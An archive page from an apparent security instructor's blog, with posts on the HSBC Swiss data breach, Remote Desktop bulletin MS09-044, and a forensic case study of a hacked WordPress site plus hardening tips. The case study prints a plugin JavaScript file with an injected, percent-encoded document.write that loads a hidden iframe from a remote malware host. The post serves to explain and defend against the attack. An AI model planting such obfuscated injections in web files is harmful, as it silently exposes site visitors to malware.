Technical Tidbits™

Archive for the ‘Security’ Category

Sorry I’ve not been around much posting and such. Dealing with some family “issues” and should have everything back to normal shortly!

That being said, I wanted to briefly comment on the article I read this morning about the HSBC Swiss Data breach.

According to the article:

A former IT employee of Swiss subsidiary HSBC Private Bank (Suisse) SA, identified by French authorities as Herve Falciani, stole the information between late 2006 and early 2007, the bank said.

My concern with this is that the breach took place in late 2006 and early 2007 and we’re just hearing about it now????

We should all be questioning what other data breaches – at other banks or companies – have taken place that affect us and our private data but we haven’t heard about????

To me, that is more frightening than the breach itself!

via HSBC: data on 24,000 Swiss account holders stolen – Yahoo! News.

Those of you who are my PC security (Introduction to PC Security) students don’t have to worry about this because in the first few lessons of the course you’ve disabled this!

However, many of you have not taken the course so I thought it was wise to post this.

Oh, and by the MAC users, this affects you too if you are using the Microsoft Remote Desktop Connection Client to connect a MAC to a windows PC.

According to Microsoft’s Security Bulletin: MS09-044:

This security update resolves two privately reported vulnerabilities in Microsoft Remote Desktop Connection. The vulnerabilities could allow remote code execution if an attacker successfully convinced a user of Terminal Services to connect to a malicious RDP server or if a user visits a specially crafted Web site that exploits this vulnerability. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

via Microsoft Security Bulletin MS09-044 – Critical: Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution 970927.

There is also known issues after installing this update, so you may want to check the bulletin for a list of those.

I’ve been teaching the Introduction to PC Security course for over 5 years and from day 1 I’ve had the students disable this service! I wonder what else you’re missing?

In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.

First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.

I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.

During my investigation, another interesting development that I was just told about, and that is another user of the web hosting service was also hacked in a similar method.

So now, I was looking into a server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites but, that leads us to the issue of the web hosting company making sure they are protecting their users!

I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users.  So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)

That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!

I poured over the SQL database dump for over 48 hours (not consecutively) and compared WP files like the WP_config.php and such and could not find anything except a strange base64-65 code that I could not isolate.

I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.

I looked at individual plug-in file JPG files and upload JPG files to see if they were actually pictures or a spoofed file name containing actual code. Still nothing.

After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!

Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.

The code resided in a plug-in called, I Love Social Bookmarking and the file affected resided in:  wp-content/plugins/i-love-social-bookmarking/includes/

The actual file was named: ilsb.js

The normal ilsb.js file should read:

// JavaScript Document
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The hacked code within Sam’s file read:

// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The offending code is the one that writes the document and includes all the percent signs (%).

This code inserted an iframe in the top of the page which redirected to a malware site.

Because of this, Sam was starting to get blacklisted on Google and Bing and her site was beginning to be blocked by software that uses Google malware detection and that included Firefox!

I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.

But here is your take-away from this experience: secure you WP blog!

1. Remove the Admin account by logging in and setting up a new administrator account with a totally different name.  Assign it the administrator priviladges.
2. Log out and log back in under the new name.
3. Delete the admin account and WordPress will ask you if you’d like to assign the posts to another user. Assign them to your new user name.
4. Install the Bad Behavior Plug-in and configure it properly.

If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!

5. Make sure you config and get the API key for Akismet.
6. Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet and suffice it to say that I believe spam comments with links may be key in this method.
7. Make sure that all users – if you allow them to register – are configured to be subscribers only!
8. If you suspect foul play of any sort, search for a hidden user. To do that:

• Click on your Users section.
• Click on the link to the Administrators page.
• Right click on the page and choose: View Source.
• Look for the following code on that source page:  tbody id="users".  It should be toward the bottom. If you have 1 registered administrator, there should only be one name in that list. If you have 2, then there should only be two names, and so on.
• If you find one, you will have to delete this person out of your SQL database.

I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!

TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here:  https://www.kb.cert.org/vuls/id/773545

And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357

*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!